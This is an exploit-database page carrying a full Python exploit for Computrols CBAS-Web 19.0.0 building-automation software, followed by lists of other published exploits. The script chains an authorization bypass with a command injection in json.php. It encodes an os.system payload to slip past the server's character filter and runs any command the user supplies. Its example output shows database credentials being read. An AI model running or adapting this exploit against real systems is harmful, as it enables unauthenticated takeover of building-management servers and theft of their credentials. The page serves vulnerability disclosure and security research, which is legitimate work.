Search for hundreds of thousands of exploits

"CBAS-Web 19.0.0 - Remote Code Execution"

Author

Exploit author

LiquidWorm

Platform

Exploit platform

hardware

Release date

Exploit published date

2019-11-12

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
# Exploit Title: CBAS-Web 19.0.0 - Remote Code Execution
# Google Dork: NA
# Date: 2019-11-11
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
# Software Link: https://www.computrols.com/building-automation-software/
# Version: 19.0.0
# Tested on: NA
# CVE : N/A
# Advisory: https://applied-risk.com/resources/ar-2019-009
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system

#!/usr/bin/env python

'''
  Computrols CBAS-Web Unauthenticated Remote Command Injection Exploit
  Affected versions: 19.0.0 and below
    by Sipke Mellema, 2019


  Uses two vulnerabilities for executing commands:
    - An authorization bypass in the auth module (CVE-2019-10853)
    - A code execution vulnerability in the json.php endpoint (CVE-2019-10854)
  
  Example usage: 
  $ python CBASWeb_19_rce.py 192.168.1.250 "cat /var/www/cbas-19.0.0/includes/db.php"
      ------------==[CBAS Web v19 Remote Command Injection

      [*] URL: http://192.168.1.250/
      [*] Executing: cat /var/www/cbas-19.0.0/includes/db.php
      [*] Cookie is authenticated
      [*] Creating Python payload..
      [*] Sending Python payload..
      [*] Server says:
      <?php
      // Base functions for database access
      // Expects a number of constants to be set.  Set settings.php

      // Only allow local access to the database for security purposes
      if(defined('WINDOWS') && WINDOWS){
          define('MYSQL_HOST', '192.168.1.2');
          define('DB_USER', 'wauser');
          define('DB_PASS', 'wapwstandard');
          /*define('DB_USER', 'root');
          define('DB_PASS', 'souper secrit');*/
          ...

'''

import requests
import sys
import base64 as b
import json


def debug_print(msg, level=0):
  if level == 0:
    print "[*] %s" % msg
  if level == 1:
    print "[-] %s" % msg

# Check parameters
if len(sys.argv) < 3:
  print "Missing target parameter\n\n\tUsage: %s <IP or hostname> \"<cmd>\"" % __file__
  exit(0)

print "------------==[CBAS Web v18 Remote Command Injection\n"

# Set host, cookie and URL
host = sys.argv[1]
cookies = {'PHPSESSID': 'comparemetoasummersday'}
url = "http://%s/" % host

debug_print("URL: %s" % url)

# Command to execute
# Only use single quotes in cmd pls
icmd = sys.argv[2]
if '"' in icmd:
  debug_print("Please don't use double quotes in your command string", level = 1)
  exit(0)

debug_print("Executing: %s" % icmd)

# URL for performing auth bypass by setting the auth cookie flag to true
auth_bypass_req = "cbas/index.php?m=auth&a=agg_post&code=test"
# URL for removing auth flag from cookie (for clean-up)
logout_sess_req = "cbas/index.php?m=auth&a=logout"
# URL for command injection and session validity checking
json_checks_req = "cbas/json.php"

# Perform logout
def do_logout():
  requests.get(url + logout_sess_req, cookies = cookies)

# Check if out cookie has the authentication flag
def has_auth():
  ret = requests.get(url + json_checks_req, cookies = cookies)
  if ret.text == "Access Forbidden":
    return False
  return True

# Set auth flag on cookie
def set_auth():
  requests.get(url + auth_bypass_req, cookies = cookies)

# =======================================================

# Perform auth bypass if not authenticated yet
if not has_auth():
  debug_print("Cookie not yet authenticated")
  debug_print("Setting auth flag on cookie via auth bypass..")
  set_auth()

# Check if bypass failed
if not has_auth():
  debug_print("Was not able to perform authorization bypass :(")
  debug_print("Exploit failed, quitting..", level = 1)
  exit(0)

else:
  debug_print("Cookie is authenticated")
  debug_print("Creating Python payload..")

  # Payload has to be encoded because the server uses the following filtering in exectools.php:
  #   $bad = array("..", "\\", "&", "|", ";", '/', '>', '<');
  # So no slashes, etc. This means only two "'layers' of quotes"
  
  # Create python code exec code
  cmd_python = 'import os; os.system("%s")' % icmd
  # Convert to Python array
  cmd_array_string = str([ord(x) for x in cmd_python])
  # Create command injection string
  p_unencoded = "DispatchHistoryQuery\t-i \"$(python -c 'exec(chr(0)[0:0].join([chr(x) for x in %s]))')\"" % cmd_array_string
  # Base64 encode for p parameter
  p_encoded = b.b64encode(p_unencoded)

  # Execute command
  debug_print("Sending Python payload..")
  ret = requests.post(url + json_checks_req, cookies = cookies, data = {'p': p_encoded})

  # Parse result
  ret_parsed = json.loads(ret.text)
  try:
    metadata = ret_parsed["metadata"]
    identifier = metadata["identifier"]

    debug_print("Server says:")
    print identifier

  # JSON Parsing error
  except:
    debug_print("Error parsing result from server :(", level = 1)

# Uncomment if you want the cookie to be removed after use
# debug_print("Logging out")
# do_logout()
Release DateTitleTypePlatformAuthor
2020-07-02"WhatsApp Remote Code Execution - Paper"webappsandroid"ashu Jaiswal"
2020-07-02"ZenTao Pro 8.8.2 - Command Injection"webappsphp"Daniel Monzón"
2020-07-02"OCS Inventory NG 2.7 - Remote Code Execution"webappsmultipleAskar
2020-07-01"Online Shopping Portal 3.1 - Authentication Bypass"webappsphp"Ümit Yalçın"
2020-07-01"e-learning Php Script 0.1.0 - 'search' SQL Injection"webappsphpKeopssGroup0day_Inc
2020-07-01"PHP-Fusion 9.03.60 - PHP Object Injection"webappsphpcoiffeur
2020-07-01"RM Downloader 2.50.60 2006.06.23 - 'Load' Local Buffer Overflow (EggHunter) (SEH) (PoC)"localwindows"Paras Bhatia"
2020-06-30"Reside Property Management 3.0 - 'profile' SQL Injection"webappsphp"Behzad Khalifeh"
2020-06-30"Victor CMS 1.0 - 'user_firstname' Persistent Cross-Site Scripting"webappsphp"Anushree Priyadarshini"
2020-06-26"Windscribe 1.83 - 'WindscribeService' Unquoted Service Path"localwindows"Ethan Seow"
Release DateTitleTypePlatformAuthor
2020-06-04"Cayin Signage Media Player 3.0 - Remote Command Injection (root)"webappsmultipleLiquidWorm
2020-06-04"Cayin Digital Signage System xPost 2.5 - Remote Command Injection"webappsmultipleLiquidWorm
2020-06-04"Cayin Content Management Server 11.0 - Remote Command Injection (root)"webappsmultipleLiquidWorm
2020-06-04"Secure Computing SnapGear Management Console SG560 3.1.5 - Arbitrary File Read"webappshardwareLiquidWorm
2020-06-04"SnapGear Management Console SG560 3.1.5 - Cross-Site Request Forgery (Add Super User)"webappshardwareLiquidWorm
2020-05-08"Extreme Networks Aerohive HiveOS 11.0 - Remote Denial of Service (PoC)"doshardwareLiquidWorm
2020-04-24"Furukawa Electric ConsciusMAP 2.8.1 - Remote Code Execution"webappsjavaLiquidWorm
2020-04-21"P5 FNIP-8x16A FNIP-4xSH 1.0.20 - Cross-Site Request Forgery (Add Admin)"webappshardwareLiquidWorm
2020-03-23"FIBARO System Home Center 5.021 - Remote File Include"webappsmultipleLiquidWorm
2020-01-29"Fifthplay S.A.M.I 2019.2_HP - Persistent Cross-Site Scripting"webappshardwareLiquidWorm
2019-12-30"WEMS BEMS 21.3.1 - Undocumented Backdoor Account"webappshardwareLiquidWorm
2019-12-30"AVE DOMINAplus 1.10.x - Unauthenticated Remote Reboot"webappshardwareLiquidWorm
2019-12-30"HomeAutomation 3.3.2 - Persistent Cross-Site Scripting"webappshardwareLiquidWorm
2019-12-30"Thrive Smart Home 1.1 - Authentication Bypass"webappsphpLiquidWorm
2019-12-30"HomeAutomation 3.3.2 - Cross-Site Request Forgery (Add Admin)"webappsphpLiquidWorm
2019-12-30"MyDomoAtHome REST API Domoticz ISS Gateway 0.2.40 - Information Disclosure"webappshardwareLiquidWorm
2019-12-30"HomeAutomation 3.3.2 - Authentication Bypass"webappsphpLiquidWorm
2019-12-30"AVE DOMINAplus 1.10.x - Authentication Bypass"webappshardwareLiquidWorm
2019-12-30"AVE DOMINAplus 1.10.x - Credential Disclosure"webappshardwareLiquidWorm
2019-12-30"HomeAutomation 3.3.2 - Remote Code Execution"webappsphpLiquidWorm
2019-12-30"AVE DOMINAplus 1.10.x - Cross-Site Request Forgery (enable/disable alarm)"webappshardwareLiquidWorm
2019-12-10"Inim Electronics Smartliving SmartLAN 6.x - Remote Command Execution"webappshardwareLiquidWorm
2019-12-10"Inim Electronics Smartliving SmartLAN 6.x - Unauthenticated Server-Side Request Forgery"webappshardwareLiquidWorm
2019-12-10"Inim Electronics Smartliving SmartLAN 6.x - Hard-coded Credentials"localhardwareLiquidWorm
2019-12-02"SmartHouse Webapp 6.5.33 - Cross-Site Request Forgery"webappsphpLiquidWorm
2019-11-14"Siemens Desigo PX 6.00 - Denial of Service (PoC)"doshardwareLiquidWorm
2019-11-13"Linear eMerge E3 1.00-06 - Remote Code Execution"webappshardwareLiquidWorm
2019-11-12"eMerge E3 Access Controller 4.6.07 - Remote Code Execution (Metasploit)"remotehardwareLiquidWorm
2019-11-12"eMerge E3 Access Controller 4.6.07 - Remote Code Execution"remotehardwareLiquidWorm
2019-11-12"CBAS-Web 19.0.0 - Information Disclosure"remotehardwareLiquidWorm
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/47627/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.